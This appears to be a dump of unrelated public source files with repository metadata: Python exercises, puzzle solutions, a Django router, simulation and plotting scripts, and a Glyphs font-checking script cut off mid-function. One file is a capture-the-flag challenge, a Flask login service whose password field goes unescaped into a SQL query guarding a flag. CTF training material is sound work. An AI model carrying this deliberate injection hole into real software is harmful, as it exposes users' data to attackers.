x += self.skip_op(self.nonlinearity(aux))
x = self.nonlinearity(x)
x = self.dropout(x)
x = self.conv2(x)
x1, x2 = torch.chunk(x, 2, dim=1)
c3 = x1 * torch.sigmoid(x2)
return x_orig + c3
|
[
"yuji.kngw.80s.revive@gmail.com"
] |
yuji.kngw.80s.revive@gmail.com
|
329a20b4c7110842b2129cc25616775c00bf8168
|
d22a2fbb9adb82644c5665242661bad172550552
|
/venv/ex44.py
|
b5c74a3b546e9fe734219d94756137000ecbe908
|
[] |
no_license
|
felipemanfrin/Python-Zero-ao-Zeno
|
e98ba3e4b974e88801b8bc947f461b125bc665b8
|
d6d08aa17071f77170bbd105452b0d05586131c8
|
refs/heads/master
| 2022-07-29T19:38:41.729178
| 2020-05-25T01:02:18
| 2020-05-25T01:02:18
| 265,356,280
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
preco = float(input('Insira o valor do produto a ser pago : '))
print('''Escolha o metodo de pagamento:
[1] A vista ou cheque
[2] a vista cartão
[3] 2x no cartao
[4] 3x ou mais no cartão''')
opcao = int(input('Digite a opção : '))
if opcao == 1 :
final = preco*0.90
print('O valor a se pagar nesses metodos é de {} '.format(final))
elif opcao == 2 :
final = preco*0.95
print('O valor a se pagar é de {}'.format(final))
elif opcao == 3 :
final = preco
print('o valor a se pagar é de {} '.format(final))
else :
final = preco *1.20
print('O valor a se pagar é de {} '.format(final))
|
[
"felipemanfrin@gmail.com"
] |
felipemanfrin@gmail.com
|
b1ef8a76cff5ccdd0bd13d20890f8c2df9f25e16
|
92578e316b0d1b760db85c449898c1560433a4bb
|
/backend/notes/urls.py
|
66f4181f4a81f45ec0f6d6b4f4f1882089f05ed7
|
[] |
no_license
|
turamant/dj_plus_vue
|
461dc6b7165ab7ecdf8eb3206ca9047b6db6c920
|
2d7b5ef897b418e5269b7b01c1fd6207ec5be4b8
|
refs/heads/main
| 2023-03-29T15:43:49.311175
| 2021-04-12T11:43:36
| 2021-04-12T11:43:36
| 357,166,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
py
|
from rest_framework import routers
from .views import NoteViewSet
# Создаем router и регистрируем наш ViewSet
router = routers.DefaultRouter()
router.register('notes', NoteViewSet)
# URLs настраиваются автоматически роутером
urlpatterns = router.urls
|
[
"tur1amant@gmail.com"
] |
tur1amant@gmail.com
|
95bc2c171d57e18811811934b2b5b0cc902e8cc5
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_137/544.py
|
d93a3ffd436e017136abd200f2f8988eb7da45e9
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
import cPickle as pickle
def main():
d = pickle.load(open('c.pickle', 'rb'))
num_of_tests = int(raw_input())
for test_i in range(num_of_tests):
n, m, k = map(int, raw_input().split())
ans = d['%s-%s-%s' % (n, m, k)]
if k == n * m - 1:
ans = 'c' + '*' * (m - 1) + '\n'
for i in range(n - 1):
ans += '*' * m + '\n'
print "Case #%d:" % (test_i + 1)
if ans[-1] == '\n':
ans = ans[:-1]
print ans
if __name__ == "__main__":
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
61ef2940a1d29bb6e311bce2f96ea1678f79606b
|
f11ecb59dab63af605c6e5f256ee59e00447ecc1
|
/763-partition-labels.py
|
f873de4ea39b18121ba64673b1decc40b496d1ef
|
[] |
no_license
|
floydchenchen/leetcode
|
626d55f72ec914764385ce82b0f3c57f5a7e9de8
|
9d9e0c08992ef7dbd9ac517821faa9de17f49b0e
|
refs/heads/master
| 2022-10-07T20:33:55.728141
| 2020-06-08T16:09:17
| 2020-06-08T16:09:17
| 269,525,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
# 763. Partition Labels
# A string S of lowercase letters is given. We want to partition this string into as many parts as possible so that each letter appears in at most one part,
# and return a list of integers representing the size of these parts.
# Example 1:
# Input: S = "ababcbacadefegdehijhklij"
# Output: [9,7,8]
# Explanation:
# The partition is "ababcbaca", "defegde", "hijhklij".
# This is a partition so that each letter appears in at most one part.
# A partition like "ababcbacadefegde", "hijhklij" is incorrect, because it splits S into less parts.
from collections import defaultdict
class Solution:
# sliding window
def partitionLabels(self, S: str) -> List[int]:
# a map to store a char's last occurring location
pos = defaultdict(int)
for i, char in enumerate(S):
pos[char] = i
partition = []
l, r = 0, 0
for i, char in enumerate(S):
# update the right index
r = max(r, pos[char])
if i == r:
partition.append(r - l + 1)
l = r + 1
return partition
|
[
"chen2918@umn.edu"
] |
chen2918@umn.edu
|
207c5d7f1c7e8039b7aad55a5d63284589af7e80
|
8ee5dfd87ce637a46c496853f55d32f226b238f8
|
/backend/Experiments/Data/PosControl/Plotter.py
|
06270322e2630227c68dd802b20334c0aec05b2d
|
[] |
no_license
|
cholazzzb/react-parrotar2-swarm
|
71eb6be8682e00015103af3df69a6cc01f7a919f
|
dccdfa841184af6ec62910f50c3335b812cd0201
|
refs/heads/main
| 2023-06-16T01:24:57.169242
| 2021-07-08T03:54:08
| 2021-07-08T03:54:08
| 354,490,913
| 0
| 0
| null | 2021-07-08T03:54:08
| 2021-04-04T08:15:37
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
import matplotlib.pyplot as plt
# from tum_PSO import tum_PSO
# from custom_PSO import custom_PSO
from custom_PSO_z import custom_PSO_z
from custom_PSO_z_lama import custom_PSO_z_lama
from fine_tuning import fine_tuning
from fine_tuning_disturbance import fine_tuning_disturbance
time = fine_tuning_disturbance["time"]
xPos = fine_tuning_disturbance["xPos"]
yPos = fine_tuning_disturbance["yPos"]
zPos = fine_tuning_disturbance["zPos"]
# range(170) for POS AND TIME
# for i in range(350):
# time.pop()
# xPos.pop()
# yPos.pop()
# zPos.pop()
xPosTarget = []
yPosTarget = []
for data in yPos:
xPosTarget.append(1.95)
yPosTarget.append(1.27)
# ----- POS AND TIME -----
plt.plot(time, xPos, label="Marvelmind Koordinat X")
plt.plot(time, xPosTarget, label="Setpoint X")
plt.plot(time, yPos, label="Marvelmind Koordinat Y")
plt.plot(time, yPosTarget, label="Setpoint Y")
plt.title("Kontrol Posisi")
plt.xlabel('Waktu (detik)')
plt.ylabel('Koordinat (meter)')
# plt.ylim(0.5, 2.5)
plt.legend(loc="lower right")
# ----- MAP -----
# plt.scatter(xPos, yPos)
# plt.title("Posisi X dan Y")
# plt.xlabel('Koordinat x (meter)')
# plt.ylabel('Koordinat y (meter)')
# plt.ylim(0.85, 2.163)
plt.show()
# Set point: X =1.95, Y = 1.27
|
[
"nicsphehehe@gmail.com"
] |
nicsphehehe@gmail.com
|
3257ffae5f57a16cff15a802d965f1ae58e0f0e7
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/tensorflow/contrib/graph_editor/subgraph.py
|
caf690f68dcdece5c40a3526673d99e70d7d5a26
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:a739031b57fa33ef7882c98b7eefeea5d588318fc9ef255db3f17b609ce8653c
size 25666
|
[
"github@cuba12345"
] |
github@cuba12345
|
62eb3d4653f8cab219e631ac922207e24e6b6594
|
f77327128a8da9702ae3443e2171bc7485ceb915
|
/main.py
|
e592f25e87e990be6bcc7a514fea58257fd7615d
|
[] |
no_license
|
SimeonYS/cadence
|
0eeba6a54c03ffb2d55466f9d8de6f1b1662002f
|
cdaef13c85a03e031a0050c89c17249cd7d83125
|
refs/heads/main
| 2023-03-31T08:24:41.408507
| 2021-03-31T10:14:01
| 2021-03-31T10:14:01
| 353,312,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 74
|
py
|
from scrapy import cmdline
cmdline.execute("scrapy crawl cadence".split())
|
[
"simeon.simeonov@ADPVT.com"
] |
simeon.simeonov@ADPVT.com
|
e04235d8de2b8dbad77d7369cee71f1946da3910
|
eabc8c12802053683ab0b42d95135c0b777945a1
|
/rooms/room-h/main.py
|
09fffc0f9de7cd8371014ddd2af950e79eb386fa
|
[] |
no_license
|
Hacker0x01/44con-ctf-2019
|
e569fb3722520411f9928c9b0d5d21d91c2ee8ca
|
4a86c14d488dd1515615d702942172fa5e7c5fc2
|
refs/heads/master
| 2023-08-08T19:34:11.081687
| 2019-09-13T22:22:30
| 2019-09-13T22:22:30
| 208,354,485
| 18
| 7
| null | 2023-07-22T16:09:35
| 2019-09-13T22:12:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,960
|
py
|
from flask import Flask, request
import hashlib, json, os, sys
from socket import *
import sqlite3
def query(sql, commit=False):
c = conn.cursor()
c.execute(sql.replace('%', '%%'))
if commit:
conn.commit()
else:
return c.fetchall()
def setup():
global conn
conn = sqlite3.connect(':memory:')
def sha1(data):
return hashlib.sha1(data).hexdigest()
conn.create_function('sha1', 1, sha1)
query('''
CREATE TABLE users (username text, password text)
''', commit=True)
query('''
INSERT INTO users (username, password) VALUES ('eldon', sha1('chess'))
''', commit=True)
query('''
CREATE TABLE flag (value text)
''', commit=True)
query('''
INSERT INTO flag (value) VALUES ('I had in mind 5ome7hing.a.little m0re~radical.')
''', commit=True)
app = Flask(__name__)
home = '''
<!doctype html>
<html>
<body>
<form action="/login" method="POST">
USERNAME: <input type="text" name="username"><br>
PASSWORD: <input type="password" name="password"><br>
<input type="submit" value="LOG IN">
</form>
</body>
</html>
'''
login = '''
<!doctype html>
<html>
<body>
<b>%s</b>
</body>
</html>
'''
@app.route('/')
def hello():
return home
@app.route('/login', methods=['POST'])
def login():
try:
username, password = request.form['username'], request.form['password']
data = query('SELECT username FROM users WHERE username=\'%s\' AND password=sha1(\'%s\')' % (
username.replace('\\', '\\\\').replace('\'', '\\\''),
password
))
if len(data) == 0:
return '<b>INVALID CREDENTIALS</b>'
else:
return '<b>INSUFFICIENT ACCESS FOR USER %s</b>' % data[0][0]
except:
return '<b>ERROR</b>'
if __name__ == "__main__":
if os.fork() > 0:
while True:
try:
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', 80))
break
except:
pass
sys.exit(0)
os.setsid()
os.umask(0)
if os.fork() > 0:
sys.exit(0)
setup()
app.run(host='127.0.0.1', port=80, threaded=False, processes=1)
|
[
"cody.brocious@gmail.com"
] |
cody.brocious@gmail.com
|
ac5e879ff023cf1256f3cf20aecf9aed14119993
|
3df1bdc21727f40ef0ee296bf137bf3190ad00ec
|
/astrodynamics/Rocket_Seminar_Series/projectile_newtonian_gravity.py
|
5b9b13fb403c9a761d3080689f4c4aae63aefae2
|
[] |
no_license
|
tin97-bb/Python
|
c2b30829fd4e14c50963dc4074e87ef06869cebe
|
3cedc7d5bef2af46b6618026cd7a41e61700ce62
|
refs/heads/master
| 2023-07-29T07:06:15.116923
| 2021-09-13T17:04:48
| 2021-09-13T17:04:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,204
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 4 21:56:24 2021
@author: carlos
"""
####Import all the modules we need
import numpy as np ###numeric python
import matplotlib.pyplot as plt ###matlab style plotting
import scipy.integrate as sci ##integration toolbox
plt.close("all")
##DEFINE SOME CONSTANT PARAMETERS
G = 6.6742*10**-11; #%%Gravitational constant (SI Unit)
###PLANET
###EARTH
Rplanet = 6357000.0 #meters
mplanet = 5.972e24 #kg
###KERBIN
#Rplanet = 600000 #meters
#mplanet = 5.2915158*10**22 #
##ROCKET
mass = 640.0/1000.0 ##kg
##Gravitational Acceleration Model
def gravity(z):
global Rplanet,mplanet
r = np.sqrt(z**2)
if r < Rplanet:
accel = 0.0
else:
accel = G*mplanet/(r**3)*r
return accel
###Equations of Motion
###F = m*a = m*zddot
## z is the altitude of the surface
## this is in meter
## zdot is the velocity
## zddot is the acceleration
###Second Order Differential Equation
def Derivatives(state,t):
###Globals
global mass
#state vector
z = state[0]
velz = state[1]
#Compute zdot - Kinematic Relationship
zdot = velz
###Compute the Total Forces
###GRavity
gravityF = -gravity(z)*mass
###Aerodynamics
aeroF = 0.0
###Thrust
thrustF = 0.0
Forces = gravityF + aeroF + thrustF
#Compute Acceleration
zddot = Forces/mass
#Compute the statedot
statedot = np.asarray([zdot,zddot])
return statedot
###########EVERYTHING BELOW HERE IS THE MAIN SCRIPT###
###Test Surface Gravity
print('Surface Gravity (m/s^2) = ',gravity(Rplanet))
###Initial Conditions
z0 = Rplanet ##m
velz0 = 25*331.0 #m/s
stateinitial = np.asarray([z0,velz0])
##Time window
tout = np.linspace(0,345,1000)
###Numerical Integration Call
stateout = sci.odeint(Derivatives,stateinitial,tout)
###REname variables
zout = stateout[:,0]
altitude = zout - Rplanet
velzout = stateout[:,1]
###Plot
###ALTITUDE
plt.plot(tout,altitude)
plt.xlabel('Time (sec)')
plt.ylabel('Altitude (m)')
plt.grid()
###VELOCITY
plt.figure()
plt.plot(tout,velzout)
plt.xlabel('Time (sec)')
plt.ylabel('Normal Speed (m/s)')
plt.grid()
|
[
"cmontalvo@southalabama.edu"
] |
cmontalvo@southalabama.edu
|
22b4ec30dc144453b9f66f4de4f090bee518ffaf
|
ecf89d17601ee16ef176a9fc0ce497e4e685cc21
|
/python/112.py
|
f74559351f115ee03b2fd2f5a3f7192f843447a5
|
[] |
no_license
|
kartikeya-shandilya/project-euler
|
daa984cda1a476a6f29b80d4b86ca03f9292d910
|
6265db7c5a8fedc3ded627829ce6040e8c8542d4
|
refs/heads/master
| 2021-01-21T04:27:36.649729
| 2020-10-13T00:25:52
| 2020-10-13T00:25:52
| 26,404,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 371
|
py
|
#!/usr/bin/python
cnt=0
for i in range(1,2500000):
j=str(i)
tag1="incr"
for k in range(0,len(j)-1):
if j[k]>j[k+1]:
tag1="bouncy"
break
tag2="decr"
for k in range(0,len(j)-1):
if j[k]<j[k+1]:
tag2="bouncy"
break
if tag1=="bouncy" and tag2=="bouncy":
cnt+=1
# print i,tag1,tag2
if cnt/(1.0*i)>0.99:
print "yes",i,cnt
break
#print "no",i,cnt
|
[
"kartikeya.shandilya@gmail.com"
] |
kartikeya.shandilya@gmail.com
|
9404f4f2483b622d387c7959245a892b14e573ae
|
291a7d6758a3e05ccb84edb9b5d5a2d8cc3cdc9c
|
/Components/Component Problem Finder.py
|
1c5659bcd073ec2b33f0c66706066ca93b699ae8
|
[
"Apache-2.0"
] |
permissive
|
Mark2Mark/Glyphs-Scripts
|
19d4235225ddba8b64de244891af60863706f374
|
204ad6d92fb14f87a7d183d7acf28b9a678ace02
|
refs/heads/master
| 2023-04-07T08:21:21.777294
| 2023-03-06T17:46:29
| 2023-03-06T17:46:29
| 81,827,927
| 1
| 0
| null | 2017-02-13T13:27:28
| 2017-02-13T13:27:28
| null |
UTF-8
|
Python
| false
| false
| 19,917
|
py
|
#MenuTitle: Component Problem Finder
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__ = """
Find and report possible issues with components and corner components.
"""
import vanilla
from timeit import default_timer as timer
def camelCaseSplit(str):
words = [[str[0]]]
for c in str[1:]:
if words[-1][-1].islower() and c.isupper():
words.append(list(c))
else:
words[-1].append(c)
return [''.join(word) for word in words]
def reportTimeInNaturalLanguage(seconds):
if seconds > 60.0:
timereport = "%i:%02i minutes" % (seconds // 60, seconds % 60)
elif seconds < 1.0:
timereport = "%.2f seconds" % seconds
elif seconds < 20.0:
timereport = "%.1f seconds" % seconds
else:
timereport = "%i seconds" % seconds
return timereport
def orthodoxComponentsForGlyph(thisGlyph):
glyphInfo = thisGlyph.glyphInfo
if glyphInfo:
componentInfo = glyphInfo.components
if componentInfo:
glyphNameTuple = tuple(c.name for c in componentInfo)
return glyphNameTuple
return None
def nameStrippedOfSuffixes(glyphName):
return glyphName[:glyphName.find(".") % (len(glyphName) + 1)]
def layerAdheresToStructure(thisLayer, glyphNameTuple):
layerComponents = thisLayer.components
numOfLayerComponents = len(layerComponents)
if numOfLayerComponents != len(glyphNameTuple):
return False
for i in range(numOfLayerComponents):
thisComponentName = thisLayer.components[i].componentName
orthodoxComponentName = glyphNameTuple[i]
if thisComponentName != orthodoxComponentName:
componentBaseName = nameStrippedOfSuffixes(thisComponentName)
orthodoxBaseName = nameStrippedOfSuffixes(orthodoxComponentName)
if componentBaseName != orthodoxBaseName:
return False
return True
class ComponentProblemFinder(object):
prefID = "com.mekkablue.ComponentProblemFinder"
prefs = (
"composablesWithoutComponents",
"unusualComponents",
"lockedComponents",
"nestedComponents",
"orphanedComponents",
"emptyComponents",
"unalignedComponents",
"scaledComponents",
"unproportionallyScaledComponents",
"rotatedComponents",
"mirroredComponents",
"shiftedComponents",
"detachedCornerComponents",
"transformedCornerComponents",
"includeAllGlyphs",
"includeNonExporting",
"reuseTab",
)
def __init__(self):
# Window 'self.w':
windowWidth = 280
windowHeight = 520
windowWidthResize = 0 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
(windowWidth, windowHeight), # default window size
"Component Problem Finder", # window title
minSize=(windowWidth, windowHeight), # minimum size (for resizing)
maxSize=(windowWidth + windowWidthResize, windowHeight + windowHeightResize), # maximum size (for resizing)
autosaveName=self.domain("mainwindow") # stores last window position and size
)
# UI elements:
linePos, inset, lineHeight = 12, 15, 22
self.w.descriptionText = vanilla.TextBox((inset, linePos + 2, -inset, 14), "New tab with glyphs containing components:", sizeStyle='small', selectable=True)
linePos += lineHeight
self.w.composablesWithoutComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Composable glyphs without components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.composablesWithoutComponents.getNSButton(
).setToolTip_("Lists glyphs that could be component-based (because they have a recipe in Glyph Info), but are lacking components.")
linePos += lineHeight
self.w.unusualComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Unusual composites (or wrong order)", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.unusualComponents.getNSButton().setToolTip_("Lists composite glyphs that contain components different from the default recipe in Glyph Info.")
linePos += lineHeight
self.w.lockedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Locked components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.lockedComponents.getNSButton().setToolTip_("Lists glyphs that contain a locked component on any of its layers.")
linePos += lineHeight
self.w.nestedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Nested components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.nestedComponents.getNSButton().setToolTip_("Lists glyphs that contain components, which in turn contain components.")
linePos += lineHeight
self.w.orphanedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Orphaned components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.orphanedComponents.getNSButton().setToolTip_("Lists glyphs that contain components referencing glyphs that do not exist in the font (anymore).")
linePos += lineHeight
self.w.emptyComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Empty components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.emptyComponents.getNSButton().setToolTip_("Lists glyphs that contain components pointing to empty layers (layers without shapes).")
linePos += lineHeight
self.w.unalignedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Unaligned components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.unalignedComponents.getNSButton().setToolTip_("Lists glyphs that contain unaligned components.")
linePos += lineHeight
# Line Separator:
self.w.line_transformedComponents = vanilla.HorizontalLine((inset, linePos + 3, -inset, 1))
linePos += int(lineHeight / 2)
self.w.scaledComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Scaled components", value=True, callback=self.SavePreferences, sizeStyle='small')
self.w.scaledComponents.getNSButton().setToolTip_("Lists all components that are not at their original size. Useful for bug tracing in variable fonts.")
linePos += lineHeight
self.w.unproportionallyScaledComponents = vanilla.CheckBox(
(inset * 2, linePos - 1, -inset, 20), "Only unproportionally scaled (h≠v)", value=True, callback=self.SavePreferences, sizeStyle='small'
)
self.w.unproportionallyScaledComponents.getNSButton().setToolTip_(
"Lists glyphs that contain components that are not scaled the same horizontally and vertically. Useful for double checking in TT exports and variable fonts."
)
linePos += lineHeight
self.w.rotatedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Rotated components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.rotatedComponents.getNSButton().setToolTip_(
"Lists all glyphs that contain rotated components, or components that are flipped BOTH horizontally and vertically. May be a good idea to check their alignment."
)
linePos += lineHeight
self.w.mirroredComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Flipped components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.mirroredComponents.getNSButton().setToolTip_("Lists all glyphs containing components that are mirrored EITHER horizontally or vertically.")
linePos += lineHeight
self.w.shiftedComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Shifted (but undistorted) components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.shiftedComponents.getNSButton().setToolTip_("Lists all glyphs containing unaligned components that are not positioned at x=0 y=0.")
linePos += lineHeight
# Line Separator:
self.w.line_cornerComponents = vanilla.HorizontalLine((inset, linePos + 3, -inset, 1))
linePos += int(lineHeight / 2)
self.w.detachedCornerComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Detached corner components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.detachedCornerComponents.getNSButton().setToolTip_("Lists all glyphs containing corner components that have lost their connection point.")
linePos += lineHeight
self.w.transformedCornerComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Transformed corner components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.transformedCornerComponents.getNSButton().setToolTip_("Lists all glyphs containing corner components that are not at 100%% scale.")
linePos += lineHeight
# Line Separator:
self.w.line_scriptOptions = vanilla.HorizontalLine((inset, linePos + 3, -inset, 1))
linePos += int(lineHeight / 2)
# Script Options:
self.w.includeAllGlyphs = vanilla.CheckBox(
(inset, linePos, -inset, 20), "Check all glyphs in font (recommended)", value=True, callback=self.SavePreferences, sizeStyle='small'
)
self.w.includeAllGlyphs.getNSButton().setToolTip_(
"If enabled, will ignore your current glyph selection, and simply go through the complete font. Recommended. May still ignore non-exporting glyph, see following option."
)
linePos += lineHeight
self.w.includeNonExporting = vanilla.CheckBox((inset, linePos, -inset, 20), "Include non-exporting glyphs", value=True, callback=self.SavePreferences, sizeStyle='small')
self.w.includeNonExporting.getNSButton().setToolTip_("If disabled, will ignore glyphs that are set to not export.")
linePos += lineHeight
self.w.reuseTab = vanilla.CheckBox((inset, linePos, 125, 20), "Reuse existing tab", value=True, callback=self.SavePreferences, sizeStyle='small')
self.w.reuseTab.getNSButton().setToolTip_("If enabled, will only open a new tab if none is open. Recommended.")
linePos += lineHeight
# Progress Bar and Status text:
self.w.progress = vanilla.ProgressBar((inset, linePos, -inset, 16))
self.w.progress.set(0) # set progress indicator to zero
self.w.status = vanilla.TextBox((inset, -18 - inset, -inset - 100, 14), "🤖 Ready.", sizeStyle='small', selectable=True)
linePos += lineHeight
# Run Button:
self.w.runButton = vanilla.Button((-100 - inset, -20 - inset, -inset, -inset), "Open Tab", sizeStyle='regular', callback=self.ComponentProblemFinderMain)
self.w.setDefaultButton(self.w.runButton)
# Load Settings:
if not self.LoadPreferences():
print("Note: 'Component Problem Finder' could not load preferences. Will resort to defaults")
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def domain(self, prefName):
prefName = prefName.strip().strip(".")
return self.prefID + "." + prefName.strip()
def pref(self, prefName):
prefDomain = self.domain(prefName)
return Glyphs.defaults[prefDomain]
def updateUI(self, sender=None):
shouldEnableRunButton = any([bool(Glyphs.defaults[self.domain(p)]) for p in self.prefs[:-3]])
self.w.runButton.enable(shouldEnableRunButton)
self.w.unproportionallyScaledComponents.enable(self.w.scaledComponents.get())
def SavePreferences(self, sender=None):
try:
# write current settings into prefs:
for prefName in self.prefs:
Glyphs.defaults[self.domain(prefName)] = getattr(self.w, prefName).get()
self.updateUI()
return True
except:
import traceback
print(traceback.format_exc())
return False
def LoadPreferences(self):
try:
for prefName in self.prefs:
# register defaults:
Glyphs.registerDefault(self.domain(prefName), prefName.startswith("include") or prefName.startswith("reuse"))
# load previously written prefs:
getattr(self.w, prefName).set(self.pref(prefName))
self.updateUI()
return True
except:
import traceback
print(traceback.format_exc())
return False
def callMethodWithArg(self, methodName, arg):
method = getattr(self, methodName)
return method(arg)
def glyphHas_composablesWithoutComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
if (thisLayer.isMasterLayer or thisLayer.isSpecialLayer) and not thisLayer.components:
info = thisGlyph.glyphInfo
if info and info.components:
print("\t🙅🏼 missing components %s on layer: %s" % (
", ".join([i.name for i in info.components]),
thisLayer.name,
))
return True
return False
def glyphHas_unusualComponents(self, thisGlyph):
componentStructure = orthodoxComponentsForGlyph(thisGlyph)
if componentStructure:
for thisLayer in thisGlyph.layers:
if not layerAdheresToStructure(thisLayer, componentStructure):
print("\t🔒 unusual components %s on layer: %s" % (
", ".join([c.name for c in thisLayer.components]),
thisLayer.name,
))
return True
return False
def glyphHas_lockedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
if thisComponent.locked:
print("\t🔒 locked component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_nestedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
originalLayer = thisComponent.componentLayer
if originalLayer and originalLayer.components:
print("\t🪆 nested component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_orphanedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
theseComponents = thisLayer.components
if theseComponents:
for thisComponent in theseComponents:
if thisComponent.component is None:
print("\t🫥 orphaned component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_emptyComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
theseComponents = thisLayer.components
if theseComponents:
for thisComponent in theseComponents:
if not thisComponent.componentLayer.shapes:
print("\t🫙 empty component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_unalignedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
theseComponents = thisLayer.components
if theseComponents:
for thisComponent in theseComponents:
if thisComponent.alignment == -1:
print("\t🤪 unaligned component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_scaledComponents(self, thisGlyph, unproportional=False):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
if thisComponent.rotation == 0.0:
hScale, vScale = thisComponent.scale
scaled = (hScale * vScale > 0.0) and (abs(hScale) != 1.0 or abs(vScale) != 1.0)
if scaled:
if unproportional:
unproportionallyScaled = abs(hScale) != abs(vScale)
if unproportionallyScaled:
print("\t🤪 unproportionally scaled component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
else:
print("\t📏 scaled component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_unproportionallyScaledComponents(self, thisGlyph):
return self.glyphHas_scaledComponents(thisGlyph, unproportional=True)
def glyphHas_rotatedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
hScale, vScale = thisComponent.scale
rotatedByScaling = hScale == vScale and hScale < 0 and vScale < 0
if thisComponent.rotation or rotatedByScaling:
print("\t🎡 rotated component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_mirroredComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
hScale, vScale = thisComponent.scale
if hScale * vScale < 0:
print("\t🪞 mirrored component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_shiftedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
hScale, vScale = thisComponent.scale
degrees = thisComponent.rotation
if hScale == 1.0 and vScale == 1.0 and degrees == 0.0:
x, y = thisComponent.position
if x != 0 or y != 0:
print("\t🏗 shifted component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_detachedCornerComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for h in thisLayer.hints:
if h.type == CORNER:
if not h.originNode:
print("\t🚨 detached corner component %s on layer: %s" % (h.name, thisLayer.name))
return True
return False
def glyphHas_transformedCornerComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisHint in thisLayer.hints:
if thisHint.type == CORNER:
if abs(thisHint.scale.x) != 1.0 or abs(thisHint.scale.y) != 1.0:
thisLayer.selection = None
thisHint.selected = True
print("\t🦄 transformed corner component %s on layer: %s" % (thisHint.name, thisLayer.name))
return True
return False
def ComponentProblemFinderMain(self, sender=None):
try:
# clear macro window log:
Glyphs.clearLog()
# start taking time:
start = timer()
# update settings to the latest user input:
if not self.SavePreferences():
print("Note: 'Component Problem Finder' could not write preferences.")
thisFont = Glyphs.font # frontmost font
